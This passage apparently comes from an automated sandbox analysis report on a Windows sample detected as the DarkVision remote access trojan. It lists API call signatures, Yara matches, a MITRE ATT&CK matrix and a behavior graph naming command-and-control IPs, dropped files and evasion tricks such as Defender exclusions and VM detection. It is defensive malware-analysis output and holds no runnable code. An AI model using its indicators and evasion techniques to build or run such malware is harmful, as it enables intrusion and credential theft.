                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_00407FE0 __snwprintf,RegCreateKeyExW,RegCloseKey,GetSystemTime,SystemTimeToFileTime,0_2_00407FE0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDC5AD0 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,RtlGetVersion,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,4_2_000001C3DDDC5AD0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092D80C _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0092D80C
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCF6DC HeapCreate,GetVersion,HeapSetInformation,4_2_000001C3DDDCF6DC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DarkVision Rat
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe PID: 7688, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7780, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected DarkVision Rat
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe PID: 7688, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7780, type: MEMORYSTR
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008E92C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,8_2_008E92C4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008D8C10 htons,bind,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,8_2_008D8C10

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts2
                    Native API                    		1
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		11
                    Input Capture                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		14
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		2
                    LSASS Driver                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol11
                    Input Capture                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		2
                    LSASS Driver                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Windows Service                    		1
                    DLL Side-Loading                    		3
                    Obfuscated Files or Information                    		NTDS225
                    System Information Discovery                    		Distributed Component Object ModelInput Capture124
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd11
                    Registry Run Keys / Startup Folder                    		1
                    Access Token Manipulation                    		2
                    Software Packing                    		LSA Secrets431
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Windows Service                    		1
                    DLL Side-Loading                    		Cached Domain Credentials121
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items311
                    Process Injection                    		11
                    File Deletion                    		DCSync12
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                    Registry Run Keys / Startup Folder                    		1
                    Masquerading                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Modify Registry                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
                    Virtualization/Sandbox Evasion                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Access Token Manipulation                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                    Process Injection                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1656296 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 04/04/2025 Architecture: WINDOWS Score: 100 52 grabify.link 2->52 54 edge.geo.kaspersky.com 2->54 56 devbuilds.s.kaspersky-labs.com 2->56 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 10 other signatures 2->78 10 SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe 3 1 2->10         started        signatures3 process4 signatures5 96 Query firmware table information (likely to detect VMs) 10->96 98 Contains functionality to inject code into remote processes 10->98 100 Adds a directory exclusion to Windows Defender 10->100 102 4 other signatures 10->102 13 svchost.exe 3 7 10->13         started        18 cmd.exe 1 10->18         started        process6 dnsIp7 64 82.29.67.160, 443, 49688, 49690 NTLGB United Kingdom 13->64 66 grabify.link 104.26.8.202, 443, 49689, 49691 CLOUDFLARENETUS United States 13->66 68 107.174.192.179, 49687, 80 AS-COLOCROSSINGUS United States 13->68 46 C:\Users\user\AppData\Local\...\w32tm.exe, PE32+ 13->46 dropped 48 C:\ProgramData\...\tzutil.exe, PE32+ 13->48 dropped 50 C:\Users\user\AppData\Local\Temp\...\set.bat, PNG 13->50 dropped 104 Benign windows process drops PE files 13->104 106 Creates autostart registry keys with suspicious names 13->106 108 Deletes itself after installation 13->108 110 Searches for specific processes (likely to inject) 13->110 20 tzutil.exe 7 4 13->20         started        25 w32tm.exe 6 13->25         started        27 cmd.exe 1 13->27         started        112 Adds a directory exclusion to Windows Defender 18->112 29 powershell.exe 23 18->29         started        31 conhost.exe 18->31         started        file8 signatures9 process10 dnsIp11 58 104.168.28.10, 49701, 49704, 49707 AS-COLOCROSSINGUS United States 20->58 60 127.0.0.1 unknown unknown 20->60 44 C:\Windows\Temp\bS4Vs_8188.sys, PE32+ 20->44 dropped 80 Multi AV Scanner detection for dropped file 20->80 82 Query firmware table information (likely to detect VMs) 20->82 84 Adds a directory exclusion to Windows Defender 20->84 86 Sample is not signed and drops a device driver 20->86 33 powershell.exe 23 20->33         started        36 powershell.exe 23 20->36         started        62 edge.geo.kaspersky.com 4.28.136.57, 443, 49731, 49736 LEVEL3US United States 25->62 88 Creates HTML files with .exe extension (expired dropper behavior) 25->88 90 Tries to evade analysis by execution special instruction (VM detection) 25->90 92 Found direct / indirect Syscall (likely to bypass EDR) 25->92 38 conhost.exe 27->38         started        94 Loading BitLocker PowerShell Module 29->94 file12 signatures13 process14 signatures15 70 Loading BitLocker PowerShell Module 33->70 40 conhost.exe 33->40         started        42 conhost.exe 36->42         started        process16

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.